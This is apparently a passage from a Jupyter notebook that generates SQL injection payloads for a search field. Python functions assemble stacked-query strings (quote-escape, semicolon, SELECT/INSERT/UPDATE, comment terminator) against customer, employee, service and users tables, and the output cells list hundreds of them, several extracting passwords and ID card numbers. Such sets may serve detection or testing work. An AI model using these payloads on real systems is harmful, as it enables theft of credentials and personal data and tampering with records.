 '\\"; SELECT fname, email, customer_id FROM customer#',
 '\\"; SELECT * FROM service-- ',
 '\\"; SELECT id_card, address, graduation_certificate, lname, nickname, email, employee_id, prefixname FROM employee-- ',
 '\\"; SELECT price FROM service# ',
 '\\"; SELECT customer_id FROM customer-- ',
 '\\"; SELECT * FROM users-- ',
 '\\"; SELECT graduation_certificate, work_background, id_card, address, fname, tel, email, nickname, lname, prefixname, house_registration FROM employee# ',
 '\\"; SELECT * FROM users#',
 '\\"; SELECT nickname, id_card, house_registration, graduation_certificate, prefixname, address, employee_id, lname, tel FROM employee-- ',
 '\\"; SELECT price FROM service-- ',
 '\\"; SELECT username FROM users#',
 '\\"; SELECT tel, fname, customer_id FROM customer# ',
 '\\"; SELECT password FROM users#',
 '\\"; SELECT * FROM employee# ',
 '\\"; SELECT employee_id, lname, prefixname, email, id_card, address, nickname, fname, graduation_certificate, work_background, tel FROM employee# ',
 '\\"; SELECT lname, employee_id, id_card, address, email, fname, nickname FROM employee# ',
 '\\"; SELECT nickname, tel, email, work_background, employee_id, prefixname, id_card FROM employee# ',
 '\\"; SELECT tel, customer_id, lname, fname FROM customer#',
 '\\"; SELECT username FROM users-- ',
 '\\"; SELECT tel, email FROM customer# ',
 '\\"; SELECT graduation_certificate FROM employee# ',
 '\\"; SELECT customer_id, lname FROM customer-- ',
 '\\"; SELECT address, work_background, prefixname, tel, nickname, employee_id, email, lname, graduation_certificate, id_card, fname FROM employee#',
 '\\"; SELECT fname, work_background, employee_id, nickname, graduation_certificate, house_registration, id_card, address, prefixname, tel FROM employee#',
 '\\"; SELECT fname, work_background, graduation_certificate, employee_id, address, house_registration, id_card, tel, nickname FROM employee# ',
 '\\"; SELECT tel, prefixname FROM employee# ',
 '\\"; SELECT tel, fname FROM customer# ',
 '\\"; SELECT fname, lname, tel FROM customer#',
 '\\"; SELECT username FROM users# ',
 '\\"; SELECT customer_id, lname, email FROM customer# ',
 '\\"; SELECT name FROM service#',
 '\\"; SELECT house_registration, prefixname, nickname, tel, fname, employee_id FROM employee# ',
 '\\"; SELECT password FROM users-- ',
 '\\"; SELECT fname, lname FROM customer#',
 '\\"; SELECT price FROM service#',
 '\\"; SELECT * FROM employee-- ',
 '\\"; SELECT id_card, tel, lname, graduation_certificate, work_background FROM employee# ',
 '\\"; SELECT fname, lname, prefixname, email, employee_id, id_card FROM employee# ',
 '\\"; SELECT house_registration, tel, id_card, prefixname, employee_id, work_background, lname, address, email FROM employee# ',
 '\\"; SELECT fname, id_card, tel, address, nickname, employee_id, graduation_certificate FROM employee-- ',
 '\\"; SELECT email, employee_id, tel, address, prefixname, id_card, nickname, house_registration FROM employee# ',
 '\\"; SELECT password FROM users# ',
 '\\"; SELECT id_card, address, email, work_background, tel, graduation_certificate, prefixname, fname FROM employee#',
 '\\"; SELECT email FROM customer# ',
 '\\"; SELECT graduation_certificate, nickname, house_registration, tel, id_card, email, prefixname, work_background, fname, employee_id FROM employee#']

In [15]:
def randomInsertForSearch(table, table_value, last):
    gen=[]
    for i in range(200) :
        preStr =""
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r'\";'+" INSERT INTO " + random_table + "("
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :
            while True:
                random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                if random_table_value not in preStr:
                    typeOfValue.append(type_of_value[random_table_value])
                    break
                continue 
                
            preStr += random_table_value
            if j != numOfParam-1 :
                preStr += ", "
        preStr += ") VALUES ("
        for j in range(numOfParam) :

            random_string=""
            first = typeOfValue.pop(0)
            if first == "tel":
                random_string = generate_random_string_tel()
            elif first == "price":
                random_string = generate_random_string_price()
            elif first == "id_card":
                random_string = generate_random_string_id_card()
            elif first == "str":
                random_string = generate_random_string_str()
            elif first == "both":
                random_string = generate_random_string_both()
                
            preStr += random_string
            if j != numOfParam-1 :
                preStr += ", "
        preStr += ")" + random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [16]:
randomInsertForSearch(table, table_value, last)

['\\"; INSERT INTO service(price) VALUES(722)# ',
 '\\"; INSERT INTO customer(customer_id) VALUES("MF1j")# ',
 '\\"; INSERT INTO employee(house_registration, email, id_card, graduation_certificate, nickname) VALUES("9n4fv89RA", "1ZAajEHQqo", 1888304160937, "wIrAi", "SAlHv")# ',
 '\\"; INSERT INTO employee(id_card, nickname, work_background, house_registration, employee_id, lname) VALUES(1669339578315, "BKgIt", "ZAUV", "aTZ2NeoPgpj8T", "3Ki1", "NhgE")#',
 '\\"; INSERT INTO customer(customer_id, lname) VALUES("R9LUfesnDjy1", "eVOQmmNETqkkZM")#',
 '\\"; INSERT INTO service(price) VALUES(430)-- ',
 '\\"; INSERT INTO service(price) VALUES(373)-- ',
 '\\"; INSERT INTO employee(employee_id, prefixname, id_card, nickname, tel) VALUES("koHgNuFa3XPjavh", "nsdKzPnoxjbH", 1547547967922, "dsEIpV", 0769198461)# ',
 '\\"; INSERT INTO customer(email) VALUES("NrqAREQfe")# ',
 '\\"; INSERT INTO users(username) VALUES("ViyQj")#',
 '\\"; INSERT INTO service(price) VALUES(934)-- ',
 '\\"; INSERT INTO users(username) VALUES("alBFnazyD")# ',
 '\\"; INSERT INTO employee(id_card, employee_id) VALUES(1630022149986, "X4jdew")# ',
 '\\"; INSERT INTO service(price) VALUES(821)#',
 '\\"; INSERT INTO customer(fname, email, lname, tel) VALUES("rLEuyNTXKHOZI", "608u4Ri5wzHpil", "wwgSWMxXW", 0778415013)# ',
 '\\"; INSERT INTO service(name) VALUES("uEbmGayC")#',
 '\\"; INSERT INTO users(username) VALUES("qgcYONisXbY")# ',
 '\\"; INSERT INTO users(username) VALUES("tsXIuFkMNm")-- ',
 '\\"; INSERT INTO customer(tel, fname, customer_id) VALUES(0449179022, "LrKvBbr", "ZkHLcV2ea")# ',
 '\\"; INSERT INTO customer(customer_id, email, lname) VALUES("Be7b", "B2DorWKzlt5Oj", "rGanidD")#',
 '\\"; INSERT INTO customer(lname, customer_id, email, tel) VALUES("vtPJTaIVE", "gbFDgpR6NwpCmP", "ur5JQZNYvEvbGyb", 0857955306)#',
 '\\"; INSERT INTO service(name) VALUES("cwLweilfvjrMea")-- ',
 '\\"; INSERT INTO employee(employee_id, email, work_background, graduation_certificate, prefixname, lname, address, tel, fname, house_registration) VALUES("ZlZ0rpE", "fkUwOq2ctVozJ", "gwKiSvTohifBbR", "6AC5R5JtR", "KQLPMQM", "eqmwj", "SeOhx4t14yqvX", 0725795903, "EFIAOHqmkODMy", "n8CYHhVpjP")-- ',
 '\\"; INSERT INTO users(password) VALUES("LrC5iCSBC")#',
 '\\"; INSERT INTO employee(lname, work_background, tel, address, id_card, employee_id, house_registration, nickname, fname, email) VALUES("MqkHaEhggIqr", "oNmJAAV", 0660519968, "R40fLOy8", 1581073637199, "muEWIID1ogi4JT", "iuEL", "nFSzkyk", "ClnPKefKGXeRuT", "2WyuCIdRSz1zVg")# ',
 '\\"; INSERT INTO service(price) VALUES(735)# ',
 '\\"; INSERT INTO users(password) VALUES("7a8jSCdaali3B8")-- ',
 '\\"; INSERT INTO customer(fname, email, lname) VALUES("iGOaGNgeVeJ", "w5SOoadSOvvmoY", "uhhqjnXOdWu")#',
 '\\"; INSERT INTO employee(id_card, employee_id, lname, house_registration, email) VALUES(1658212235009, "3UosO9", "NXzSOHNoxqiM", "wZUS0iI", "dVFLnhYTb1WD")-- ',
 '\\"; INSERT INTO employee(work_background, lname, prefixname, employee_id, tel, address, graduation_certificate, email, nickname) VALUES("vfi2pxrFQvSV5zx", "BfnldbDaFB", "oGBRzyVTFDnmPW", "xiVK", 0434738261, "DbvteNpqtAIo", "pBwP", "Y3LBHJWH", "mYJOW")-- ',
 '\\"; INSERT INTO service(price) VALUES(214)# ',
 '\\"; INSERT INTO service(name) VALUES("SfHVVwo")#',
 '\\"; INSERT INTO employee(id_card, employee_id, tel, address, house_registration) VALUES(1843639753671, "HS3Xu", 0293249320, "g4P485zWWG1p6", "gqQ1")-- ',
 '\\"; INSERT INTO users(password) VALUES("EU0AtKYVunbaP")# ',
 '\\"; INSERT INTO customer(customer_id, fname) VALUES("Dl6dQpwk", "HVfo")-- ',
 '\\"; INSERT INTO customer(customer_id, tel, fname, email) VALUES("N4b9De", 0218940166, "ZKaFftVfGd", "Syyj6u")-- ',
 '\\"; INSERT INTO users(password) VALUES("GbL391yQMNfqrQ")#',
 '\\"; INSERT INTO customer(email) VALUES("p3IdE0vp")#',
 '\\"; INSERT INTO employee(prefixname, nickname) VALUES("vsAlerYxKChvI", "lNAxr")#',
 '\\"; INSERT INTO employee(id_card, fname, work_background, employee_id, prefixname, nickname, tel, lname, graduation_certificate) VALUES(1867139106535, "gRjAmOO", "xvqgvIwKo", "hG1b3j2NE", "VZPBhTHftg", "TcURHl", 0412368528, "LIauX", "lJJn5TtuZv1CkE")-- ',
 '\\"; INSERT INTO service(price) VALUES(929)# ',
 '\\"; INSERT INTO employee(email, id_card, employee_id) VALUES("2e4kCgL34", 1701883159459, "NZACGA8Q")-- ',
 '\\"; INSERT INTO service(price) VALUES(487)#',
 '\\"; INSERT INTO employee(address) VALUES("7fU7J")# ',
 '\\"; INSERT INTO service(name) VALUES("xyYh")#',
 '\\"; INSERT INTO employee(nickname, id_card, fname, graduation_certificate, prefixname, house_registration, tel, employee_id, address, email) VALUES("OZlkFxwxWRFDR", 1770687973862, "HqaFnzTuir", "Dq4hGAVke8", "ermSmSAKcEy", "vnyKOEzzudqj3QN", 0924595247, "xNERE30jw", "Z143Z1CJ3RHE", "4BM28tqy8j")#',
 '\\"; INSERT INTO employee(employee_id) VALUES("uJpQePch2")-- ',
 '\\"; INSERT INTO users(username) VALUES("WybgTePvUgW")# ',
 '\\"; INSERT INTO service(name) VALUES("FzIcQzYAw")# ',
 '\\"; INSERT INTO service(name) VALUES("CrnIwTrHYi")#',
 '\\"; INSERT INTO users(username) VALUES("ZiThqUvIw")#',
 '\\"; INSERT INTO users(username) VALUES("QEoHifEQjyHkY")# ',
 '\\"; INSERT INTO service(name) VALUES("GVUAhOxfF")# ',
 '\\"; INSERT INTO customer(email, fname) VALUES("2J0Qgasx1v", "SJMVdvgRj")#',
 '\\"; INSERT INTO service(name) VALUES("WFJFa")-- ',
 '\\"; INSERT INTO service(name) VALUES("BhDGCbQZxkoBtNB")-- ',
 '\\"; INSERT INTO customer(lname, email, customer_id) VALUES("wqkthDfCcGzcwNF", "BEBLcL", "ySqTR6WSLPUH2")# ',
 '\\"; INSERT INTO customer(lname) VALUES("HZUHEetqnKAnRQ")#',
 '\\"; INSERT INTO service(price) VALUES(253)-- ',
 '\\"; INSERT INTO employee(id_card, email, prefixname) VALUES(1699428858969, "uv0RmWYRV0", "kKXfQG")-- ',
 '\\"; INSERT INTO service(price) VALUES(200)#',
 '\\"; INSERT INTO service(name) VALUES("gPENgqhaCiQif")-- ',
 '\\"; INSERT INTO employee(fname, lname) VALUES("JumHP", "NxcYIXBA")# ',
 '\\"; INSERT INTO service(name) VALUES("suFyNoEioFZBYDR")#',
 '\\"; INSERT INTO service(name) VALUES("GaKKISGuMwsOd")-- ',
 '\\"; INSERT INTO users(username) VALUES("tFjzQbxBxx")# ',
 '\\"; INSERT INTO customer(customer_id) VALUES("XdWHlND44RQB")# ',
 '\\"; INSERT INTO service(price) VALUES(585)# ',
 '\\"; INSERT INTO users(username) VALUES("mBWwV")-- ',
 '\\"; INSERT INTO employee(nickname, work_background, fname, lname, employee_id, tel, address, house_registration) VALUES("MvysvZvQ", "aXCzFmWT", "YWEqdKutYuBEEOq", "lPPEu", "GPKUp9w5g2YaM", 0931300205, "5ygjaGSQJ5J5k", "AKsDr0EcK3H8gQC")# ',
 '\\"; INSERT INTO employee(house_registration, fname, email, prefixname) VALUES("foAqq9iScC0u", "Jggqa", "Aq5JWfJS3q", "mqOgzPhigJQ")-- ',
 '\\"; INSERT INTO service(name) VALUES("fUNUADoAZz")#',
 '\\"; INSERT INTO employee(id_card, graduation_certificate, nickname, employee_id, work_background, house_registration, prefixname, lname, email, address) VALUES(1506380698388, "vMSJOsDvi", "saRTgu", "L8SrJh55yjjgQLW", "Cy6fx3Xzdh0N3", "WT0KggLzQufx6q", "eieiOmoAJRJ", "MkjVK", "6Snh", "1XmHdTOe")# ',
 '\\"; INSERT INTO customer(fname, lname) VALUES("HpXiKtDVkhOWIi", "mzNIGCmQRr")# ',
 '\\"; INSERT INTO employee(nickname, house_registration, lname, fname, id_card, address, email, graduation_certificate, tel, employee_id, work_background) VALUES("tXpVXJ", "URdBdZpAhDc9acN", "snsGgkOd", "JSeHqioji", 1763922556185, "4mgbyU72tci0Aw", "zNyJmn7", "dSLViyJ", 0677667694, "rAZPMe1SIiPHe", "LMGeS41QU5JW")#',
 '\\"; INSERT INTO employee(address, email, lname, house_registration, tel, nickname, id_card, work_background, employee_id, graduation_certificate, fname) VALUES("rjVNurkJczL", "NuinWrj0m", "xJhx", "vrRj", 0153606966, "QbpEzi", 1600431866720, "9EcU", "TuxkPP", "S4rfbxlO", "lwYzEUetkBGobLD")#',
 '\\"; INSERT INTO customer(customer_id, fname, email, tel) VALUES("bL45DOc87KLlnSB", "aRehZwJgI", "gUeLPHA", 0809720027)-- ',
 '\\"; INSERT INTO service(name) VALUES("MTRhA")# ',
 '\\"; INSERT INTO employee(graduation_certificate, nickname, email, tel, house_registration, address, prefixname, employee_id) VALUES("QAwidU", "faxNFTpRB", "eqke3Ynja", 0632747863, "3OjjNV", "llW1OQ", "gbMBXRhSFTjMyK", "QHnZau")# ',
 '\\"; INSERT INTO employee(house_registration, work_background) VALUES("8QdFMrQc2Nfm3gR", "68Oq1JH2r")-- ',
 '\\"; INSERT INTO users(username) VALUES("hQAAhFBos")# ',
 '\\"; INSERT INTO employee(house_registration, nickname, lname, prefixname, tel, employee_id) VALUES("11bZ", "zomnhmlzg", "adWgXaGPCwAMKTF", "KFkXXONUZtXAh", 0738932496, "kyS2")#',
 '\\"; INSERT INTO service(price) VALUES(848)-- ',
 '\\"; INSERT INTO users(password) VALUES("Ax4RLM7OXM4N7")#',
 '\\"; INSERT INTO users(password) VALUES("X2k0OpaooM1aK")#',
 '\\"; INSERT INTO customer(customer_id, fname, lname, tel) VALUES("kRdg", "HqBPsQsvBxOI", "oFdpxvC", 0592331110)#',
 '\\"; INSERT INTO employee(fname, nickname, graduation_certificate) VALUES("LjHdwgeFqIRg", "GmhUirtYkk", "xl2i27bpN")-- ',
 '\\"; INSERT INTO customer(lname, fname, customer_id, tel) VALUES("mhXFXG", "jxqxqnRD", "ZqqXIX8o", 0586216434)-- ',
 '\\"; INSERT INTO customer(fname, lname, customer_id) VALUES("lTVvJqsw", "FIoqe", "KpHcjvh9BV9R")# ',
 '\\"; INSERT INTO customer(lname) VALUES("PfMqwdnLUJFsCKk")# ',
 '\\"; INSERT INTO employee(email, work_background) VALUES("z7aO0ZnB", "gBkq51VoC4EME7T")#',
 '\\"; INSERT INTO employee(house_registration, address, tel) VALUES("Ye1neKxi4Lbnh", "rot32QV", 0531463405)# ',
 '\\"; INSERT INTO customer(email, customer_id) VALUES("2CIRfUkUoqRBGyz", "Yy0YeOuknfq5sP")-- ',
 '\\"; INSERT INTO users(username) VALUES("xSUg")# ',
 '\\"; INSERT INTO service(price) VALUES(674)#',
 '\\"; INSERT INTO users(username) VALUES("RccmUAAVdja")-- ',
 '\\"; INSERT INTO users(username) VALUES("ObHBnS")#',
 '\\"; INSERT INTO service(price) VALUES(163)# ',
 '\\"; INSERT INTO users(username) VALUES("BgKkdU")#',
 '\\"; INSERT INTO users(password) VALUES("bCE25pmbNXn")-- ',
 '\\"; INSERT INTO service(name) VALUES("HoSkvqoaulUrnj")#',
 '\\"; INSERT INTO service(name) VALUES("izHjLVzfIiNvf")# ',
 '\\"; INSERT INTO service(price) VALUES(094)-- ',
 '\\"; INSERT INTO service(price) VALUES(390)#',
 '\\"; INSERT INTO service(name) VALUES("tzENYovSCHD")# ',
 '\\"; INSERT INTO customer(lname, customer_id) VALUES("CNgDFbatYS", "mGCWBSPH4BXL")#',
 '\\"; INSERT INTO employee(prefixname, lname, tel, employee_id, email) VALUES("ZXhAaqJyKiHR", "NQOPWJwPpNCli", 0109799468, "dGA0X3RC", "0LBYJOcqyqpwDh")#',
 '\\"; INSERT INTO users(username) VALUES("puLPQNwLtwjcR")#',
 '\\"; INSERT INTO customer(lname, email, tel, fname) VALUES("xgwyxdSBQam", "7V2IUR4qayG", 0886650446, "jxSkl")# ',
 '\\"; INSERT INTO customer(fname, tel) VALUES("HFOymXpQPXZpZ", 0743200023)# ',
 '\\"; INSERT INTO customer(fname, lname, email) VALUES("WfikpHx", "zIdCRwj", "1OQjN4otb7aKH")#',
 '\\"; INSERT INTO users(username) VALUES("waRwDUinZ")#',
 '\\"; INSERT INTO users(username) VALUES("YQYe")# ',
 '\\"; INSERT INTO employee(id_card, graduation_certificate, house_registration, email, prefixname, tel, fname, nickname, work_background) VALUES(1664082650287, "o2eN", "0v7jRtI", "CST4FzVZHYBF0be", "QYxos", 0506698305, "ThYuucTufQhad", "snwnfwVVuyNCqPD", "792m")-- ',
 '\\"; INSERT INTO employee(fname, work_background, employee_id, nickname, email, address, prefixname, lname) VALUES("jWvnmIkwB", "wPProMpohnC6pI", "aUcBiSUSGnIwxV", "AFah", "GSHf8GdM", "yVgvW6cnBAhaf0v", "dnswdITFTF", "zDlInHsZqWQUFJ")#',
 '\\"; INSERT INTO employee(address, id_card, prefixname, tel, house_registration, graduation_certificate) VALUES("c4jLta", 1870407905715, "HHmsiJATlfg", 0776166624, "VRQkjR", "9utNhsXb")#',
 '\\"; INSERT INTO users(password) VALUES("m41gkXZ8imk")-- ',
 '\\"; INSERT INTO employee(address) VALUES("dYWI")-- ',
 '\\"; INSERT INTO customer(customer_id, fname, email, tel) VALUES("565FSuDqXEvQABQ", "NpVCPKPIyZ", "cTHBjUpyZ", 0702603322)# ',
 '\\"; INSERT INTO users(username) VALUES("TVczpZmAN")# ',
 '\\"; INSERT INTO users(username) VALUES("rMLpoPtVmZCsPgY")#',
 '\\"; INSERT INTO customer(fname) VALUES("Goumgg")# ',
 '\\"; INSERT INTO service(name) VALUES("LHgIdJHXrc")# ',
 '\\"; INSERT INTO service(name) VALUES("relWvGiMaWSZBWu")#',
 '\\"; INSERT INTO users(username) VALUES("JwCrCbPhPFS")#',
 '\\"; INSERT INTO service(price) VALUES(840)-- ',
 '\\"; INSERT INTO employee(id_card, lname, fname, email, house_registration, nickname) VALUES(1649905179034, "QIJmIHqtSLGh", "WzZel", "K4c55SmZlw8TQJ", "5ZymGbpZrtvZ1My", "iWavROaXDnAH")-- ',
 '\\"; INSERT INTO users(username) VALUES("SEAtaMy")-- ',
 '\\"; INSERT INTO service(name) VALUES("mLsmBVrAcWSMfw")-- ',
 '\\"; INSERT INTO customer(lname, customer_id, tel, email) VALUES("wWopb", "PbRg1BfXAv8rW", 0372334676, "JZRuFT6A")-- ',
 '\\"; INSERT INTO customer(email, tel) VALUES("IniNqmAN", 0656921904)#',
 '\\"; INSERT INTO employee(employee_id, tel, graduation_certificate) VALUES("gsZjVYY", 0314083640, "xGnnkJxJ0kQeTf")#',
 '\\"; INSERT INTO service(name) VALUES("kUQPKA")#',
 '\\"; INSERT INTO service(price) VALUES(866)#',
 '\\"; INSERT INTO users(username) VALUES("oaAmB")# ',
 '\\"; INSERT INTO users(password) VALUES("i6wQj3uibJ1P")-- ',
 '\\"; INSERT INTO customer(fname, lname, customer_id) VALUES("gCxYavxI", "mDCJUFlZOBN", "mAdGo")# ',
 '\\"; INSERT INTO customer(email) VALUES("lDJeK4phuAr7n")# ',
 '\\"; INSERT INTO users(username) VALUES("jyQcGgDxRnwejNk")# ',
 '\\"; INSERT INTO employee(nickname, house_registration, lname, employee_id, id_card, prefixname, fname) VALUES("tRpRARoBsHiTFV", "II8ykgBJqb", "JTnEPKKrHwCuq", "te8W", 1583518968115, "MGZA", "FnymbHYHVWcu")# ',
 '\\"; INSERT INTO customer(lname) VALUES("RpVgvsZyy")# ',
 '\\"; INSERT INTO employee(graduation_certificate) VALUES("1TcjoPG4Nxynix5")-- ',
 '\\"; INSERT INTO customer(lname, customer_id, email) VALUES("dVWaFYUiTfHzsKk", "uicYRed", "A4d2hNOkmYJ")# ',
 '\\"; INSERT INTO employee(graduation_certificate, lname, employee_id, nickname, email, id_card, fname) VALUES("GqC7kqlISH", "kjqzgprikeV", "wBWXs", "cppRSSSgYoDtMtu", "AyFSt8FbeiZnrq", 1608437535277, "AXNEPDC")#',
 '\\"; INSERT INTO employee(nickname) VALUES("vVbQSKseYSYTDp")#',
 '\\"; INSERT INTO customer(tel, lname, fname) VALUES(0404499926, "FpoZjx", "MWaRjlSrxI")-- ',
 '\\"; INSERT INTO users(password) VALUES("d4D3wo")#',
 '\\"; INSERT INTO customer(tel, lname, customer_id, fname) VALUES(0541696533, "QKOKCNaBByYyVjx", "DcHTE", "uJEyQJYJQPTUE")#',
 '\\"; INSERT INTO service(name) VALUES("cgSzrz")-- ',
 '\\"; INSERT INTO service(name) VALUES("bYsNjjRn")-- ',
 '\\"; INSERT INTO employee(id_card, tel, prefixname, employee_id, address, fname, email) VALUES(1951249971868, 0315422243, "KEZw", "JD7DZE5fS", "4ddIPPxk", "DRxZNRZwhkW", "hSA7jkMc")# ',
 '\\"; INSERT INTO service(name) VALUES("DVcyTLZWPeMdNzr")#',
 '\\"; INSERT INTO customer(fname) VALUES("WlsvKaARhEASec")# ',
 '\\"; INSERT INTO users(username) VALUES("hnNaNaJ")-- ',
 '\\"; INSERT INTO users(password) VALUES("CZA0eVa")# ',
 '\\"; INSERT INTO employee(graduation_certificate, house_registration) VALUES("o8lZBICnwZ40", "1KFsXAYVcQpV")-- ',
 '\\"; INSERT INTO employee(nickname, fname, id_card, employee_id) VALUES("AUUc", "EoULPsKBmrYA", 1663072359281, "imrt6R5EVR5lO")-- ',
 '\\"; INSERT INTO service(price) VALUES(871)-- ',
 '\\"; INSERT INTO employee(fname, id_card, work_background, address, prefixname, nickname) VALUES("lLLJIRMR", 1970139995109, "i19fgec2FlYnIFs", "uHnaBZXzg6FNH", "gEnfgayderpoh", "xjKvIcGmFsMgIP")# ',
 '\\"; INSERT INTO users(password) VALUES("oQoj2N")# ',
 '\\"; INSERT INTO employee(lname, email, id_card, prefixname, nickname, work_background) VALUES("MZleDQyuAE", "3drIBgQWW", 1906983633217, "dUXVy", "dLhfsTpLvPtsyRz", "gBZfK4UR37P4")# ',
 '\\"; INSERT INTO service(name) VALUES("yvsHixPNHW")# ',
 '\\"; INSERT INTO customer(customer_id, fname) VALUES("UmVnSWJlsqffzZ", "UkYxMGANrqWpWO")# ',
 '\\"; INSERT INTO service(name) VALUES("VjjrlPBUzyxZRP")-- ',
 '\\"; INSERT INTO customer(customer_id, fname, tel) VALUES("qVMW", "ctNjFqPwDouENl", 0814542876)# ',
 '\\"; INSERT INTO employee(tel, fname, lname, id_card, address, employee_id, graduation_certificate, email, nickname) VALUES(0257831136, "bGiWR", "gWsjHBXClbHl", 1559113495546, "UNj8", "lMnkO2hxOMV", "Aflc", "2FUTasrt8Cuyh9", "MZYLDBDujk")#',
 '\\"; INSERT INTO users(username) VALUES("CmQxKYUYhUmfOaQ")# ',
 '\\"; INSERT INTO service(price) VALUES(239)# ',
 '\\"; INSERT INTO employee(id_card, prefixname, fname, email, graduation_certificate) VALUES(1751970878618, "ToYP", "aymxGUdhgYbvbe", "UTo1crs72sU", "VguFt6CQfXpGcU")#',
 '\\"; INSERT INTO service(price) VALUES(139)# ',
 '\\"; INSERT INTO service(price) VALUES(207)# ',
 '\\"; INSERT INTO users(username) VALUES("IvSUVxdyLf")#',
 '\\"; INSERT INTO users(password) VALUES("EBNNaE0gOV")#',
 '\\"; INSERT INTO users(username) VALUES("VjHmgYwxpxstYC")# ',
 '\\"; INSERT INTO users(password) VALUES("I4Mmn9Pa0cT")-- ',
 '\\"; INSERT INTO service(name) VALUES("jAYTqMGHl")# ',
 '\\"; INSERT INTO users(password) VALUES("4hNBojkDo")-- ',
 '\\"; INSERT INTO employee(fname, graduation_certificate, nickname, email, house_registration, tel, id_card, employee_id, work_background, address) VALUES("xCxxK", "LvSnIw", "pqPNemj", "1n8tpscImHN", "VxQp6j6WEb4A", 0817266843, 1903785286505, "29yDsZNuUi4ft", "Ucn71eozun0t7", "P23hd")#',
 '\\"; INSERT INTO service(price) VALUES(721)-- ',
 '\\"; INSERT INTO employee(house_registration, nickname, prefixname, work_background, employee_id, id_card, fname, tel, email, graduation_certificate) VALUES("sqXMGs", "dWgCAFVgIqHLVHe", "uwmYaKoPOwNQx", "RemHst3", "jLjZr", 1541561824742, "GvXmqfNQ", 0762392411, "8ZQitU0r6Lc0d8H", "HFrlIWHc")#',
 '\\"; INSERT INTO employee(house_registration, address, email, employee_id, nickname) VALUES("nrBjcFB", "4hMUdJ88", "mzfvN", "x8V3X0Lrv", "hwksydagS")# ',
 '\\"; INSERT INTO employee(id_card, nickname, address, prefixname, graduation_certificate, work_background, fname) VALUES(1706060981100, "gIVbH", "3ViLfCyIMb6lkZ", "FRnnn", "GrBaaD4", "YBEdKc", "vNgyCQyDQZ")# ',
 '\\"; INSERT INTO customer(lname, email, customer_id, fname) VALUES("muJiaBf", "BCNwDUYYh9", "HCSAN5", "XcYg")# ',
 '\\"; INSERT INTO users(password) VALUES("GYT1WdT")#',
 '\\"; INSERT INTO customer(customer_id) VALUES("C1gajnH")-- ',
 '\\"; INSERT INTO customer(customer_id) VALUES("zdf4IEL")#',
 '\\"; INSERT INTO service(name) VALUES("PbfCqHo")#',
 '\\"; INSERT INTO employee(nickname) VALUES("rMzqZNJXhhyZ")-- ',
 '\\"; INSERT INTO customer(email, customer_id, fname) VALUES("hAyO8a1Q1P1", "hPQdI0UzK", "ZfgDfuKfQZRx")#',
 '\\"; INSERT INTO employee(lname, house_registration, address, graduation_certificate, id_card, prefixname, work_background, nickname) VALUES("VaRPbfXjc", "z8xzN6u", "ZAa5fpi", "JxqeAJpMkeBy", 1652985766362, "SjgfmWPrU", "68hA8N0Wy5RYJ5a", "nCkgNfIcxp")#',
 '\\"; INSERT INTO users(password) VALUES("MzC1J60gpsv")-- ',
 '\\"; INSERT INTO service(name) VALUES("RyPHlLUaaDHgGlS")#',
 '\\"; INSERT INTO service(name) VALUES("OKoGSoCBNUT")#',
 '\\"; INSERT INTO customer(fname, customer_id, tel, lname) VALUES("TWktzZEP", "vqsGIAfK", 0910843691, "WsRTwtQcFcOCHZV")-- ',
 '\\"; INSERT INTO customer(email, fname) VALUES("ZgGpkinxppo", "nyuhTG")-- ',
 '\\"; INSERT INTO employee(house_registration, email, prefixname, id_card, tel, graduation_certificate, fname, address, employee_id, work_background, nickname) VALUES("iCMF1YkHnhFf7Lt", "sNBR7uo67XnQp", "xxPsfqUlAbQ", 1564868425778, 0383895048, "9NYVV3xkqwhYfd7", "rOHu", "SoPi", "MXRvE6", "Eh38fXNZ4t", "EporfeXw")-- ',
 '\\"; INSERT INTO service(price) VALUES(826)-- ',
 '\\"; INSERT INTO users(password) VALUES("QriO62tL2koAY")-- ',
 '\\"; INSERT INTO users(password) VALUES("hoYlPNx")-- ',
 '\\"; INSERT INTO users(password) VALUES("GWbHxptRyeCK1r")# ']

In [17]:
def randomUpdateForSearch(table, table_value, last):
    gen=[]
    for i in range(200) :
        preStr =""
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r'\";' + " UPDATE " + random_table + " SET "
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :
            while True:
                random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                if random_table_value not in preStr:
                    typeOfValue.append(type_of_value[random_table_value])
                    break
                continue 
            
            random_string=""
            first = typeOfValue.pop(0)
            if first == "tel":
                random_string = generate_random_string_tel()
            elif first == "price":
                random_string = generate_random_string_price()
            elif first == "id_card":
                random_string = generate_random_string_id_card()
            elif first == "str":
                random_string = generate_random_string_str()
            elif first == "both":
                random_string = generate_random_string_both()

            preStr += random_table_value + " = " + random_string
            if j != numOfParam-1 :
                preStr += ", "
        random_table_value2=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        first2 = type_of_value[random_table_value2]

        random_string2=""
        if first2 == "tel":
            random_string2 = generate_random_string_tel()
        elif first2 == "price":
            random_string2 = generate_random_string_price()
        elif first2 == "id_card":
            random_string2 = generate_random_string_id_card()
        elif first2 == "str":
            random_string2 = generate_random_string_str()
        elif first2 == "both":
            random_string2 = generate_random_string_both()
            
        preStr += " WHERE " + random_table_value2 + " = " + random_string2 +random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
        
    return gen

In [18]:
randomUpdateForSearch(table, table_value, last)

['\\"; UPDATE customer SET customer_id = "L0DWp1P7H", lname = "UiiOfBVlFfbehs", email = "AWdJxi5V2Brif", fname = "ZtVOY" WHERE customer_id = "JCc5h6qiiIE"-- ',
 '\\"; UPDATE customer SET tel = 0740374732, email = "RZsE", customer_id = "Tz3hIh4x7MxRrv" WHERE customer_id = "8Qys5UHu1qYbtA"-- ',
 '\\"; UPDATE service SET name = "vnHHjpjUyaPj" WHERE price = 455-- ',
 '\\"; UPDATE customer SET fname = "GAtSpSMqEsh", customer_id = "VgLF25vzAbx6nGy", email = "pbGKx3sEOCo4" WHERE email = "RemwLeK0Cp8NwCg"-- ',
 '\\"; UPDATE employee SET employee_id = "L38AXnyeB" WHERE lname = "BHfzTMXBiTw"-- ',
